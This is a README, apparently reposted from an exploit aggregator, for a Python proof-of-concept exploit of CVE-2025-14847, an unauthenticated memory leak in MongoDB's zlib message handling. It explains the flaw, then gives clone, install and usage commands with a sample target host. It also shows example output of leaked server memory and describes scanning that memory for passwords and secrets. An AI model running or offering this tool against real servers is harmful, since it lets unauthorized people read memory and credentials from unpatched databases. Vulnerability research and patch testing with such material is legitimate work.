Share
## https://sploitus.com/exploit?id=03B41327-D2A1-5F6C-A672-35EB0BD49A05
# CVE-2025-14847 – MongoDB Unauthenticated Memory‑Leak Exploit

## Overview
A proof‑of‑concept (PoC) exploit for the MongoDB *zlib decompression* vulnerability that allows unauthenticated attackers to read sensitive server memory.  
The PoC is implemented in Python 3 and demonstrates how a malicious `OP_COMPRESSED` packet can trigger the bug, causing MongoDB to return uninitialized memory as BSON data.

---

## What the Exploit Does

The vulnerability is caused by a flaw in MongoDB’s zlib message decompression:

1. **A compressed message with an inflated `uncompressedSize` claim is sent.**  
2. **MongoDB allocates a large buffer** based on that inflated value.  
3. **zlib decompresses the actual data into the start of that buffer.**  
4. **MongoDB treats the entire buffer as valid data,** leading to reading of *uninitialized* memory.  
5. **BSON parsing then reads “field names”** from that memory until a null byte is hit, exposing hidden data.

The PoC sends a crafted `OP_COMPRESSED` packet and parses the server’s error response to recover leaked data fragments.

---

## Prerequisites

| Component | Version | Notes |
|-----------|---------|-------|
| Python | ≥ 3.8 | The script is Python‑3 only |
| MongoDB | ≥ 4.4 | Target must be vulnerable to CVE‑2025‑14847 |
| Optional | `requirements.txt` | Provided in the repo |

---

## Installation

```bash
# Clone the repo (or copy the script)
git clone https://github.com/lincemorado97/CVE-2025-14847.git
cd cve-2025-14847

# (Optional) Install required Python packages
pip install -r requirements.txt
```

---

## Usage

```bash
python exploit.py [OPTIONS]
```

| Option | Default | Description |
|--------|---------|-------------|
| `--host` | `localhost` | Target MongoDB host |
| `--port` | `27017` | Target MongoDB port |
| `--min-offset` | `20` | Minimum document length to probe |
| `--max-offset` | `8192` | Maximum document length to probe |
| `--output` | `leaked.bin` | File where leaked data is saved |

**Example:**

```bash
python exploit.py --host 10.0.0.5 --port 27017 --min-offset 50 --max-offset 5000 --output leaks.bin
```

---

## Example

```bash
$ python3 exploit.py 
11:02:41 CVE-2025-14847     INFO │ [*] Target: localhost:27017
11:02:41 CVE-2025-14847     INFO │ [*] Scanning offsets 20-8192
11:02:41 CVE-2025-14847     INFO │ Offset      Hex                                              ASCII
11:02:41 CVE-2025-14847     INFO │ ---------------------------------------------------------------------------
11:02:41 CVE-2025-14847     INFO │ 00000000:  20 6f 62 6a 65 63 74 20 77 69 74 68 20 75 6e 6b  | object with unk|
11:02:41 CVE-2025-14847     INFO │ 00000010:  6e 6f 77 6e 20 5f 69 64                          |nown _id|
11:02:41 CVE-2025-14847     INFO │ [+] offset=  39 len=  24:
11:02:45 CVE-2025-14847     INFO │ Offset      Hex                                              ASCII
11:02:45 CVE-2025-14847     INFO │ ---------------------------------------------------------------------------
11:02:45 CVE-2025-14847     INFO │ 00000000:  73 20 73 6b 69 70 70 65 64 20 64 75 72 69 6e 67  |s skipped during|
11:02:45 CVE-2025-14847     INFO │ 00000010:  20 74 72 65 65 20 77 61 6c 6b                    | tree walk|
11:02:45 CVE-2025-14847     INFO │ [+] offset=3064 len=  26:
11:02:50 CVE-2025-14847     INFO │ Offset      Hex                                              ASCII
....
11:02:50 CVE-2025-14847     INFO │ [+] offset=6663 len=  38:
11:02:52 CVE-2025-14847  SUCCESS │ [*] Total leaked: 496 bytes
11:02:52 CVE-2025-14847  SUCCESS │ [*] Unique fragments: 85
11:02:52 CVE-2025-14847  SUCCESS │ [*] Saved to: leaked.bin
```

The script will log each interesting fragment (length > 10 bytes) and output a hexdump view. All leaked data is appended to `leaked.bin`.

![demo](images/demo.png)

---

## Understanding the Output

- **Hexdump**: Shows a subset of the leaked data in both hex and ASCII.  
- **Log lines**: `[+] offset=  len= ` indicates where a fragment was found.  
- **Total leaked**: Bytes written to the output file.  
- **Unique fragments**: Distinct data blocks detected.  
- **Secret detection**: The script prints any of the predefined patterns (`password`, `secret`, etc.) found in the leaked data.

## References
* CVE-2025-14847 – https://nvd.nist.gov/vuln/detail/CVE-2025-14847
* Analysis: https://www.ox.security/blog/attackers-could-exploit-zlib-to-exfiltrate-data-cve-2025-14847/

## Disclaimer

This PoC is provided "as is" without any warranty. The author is not responsible for any misuse or damage caused by this script. Use it at your own risk.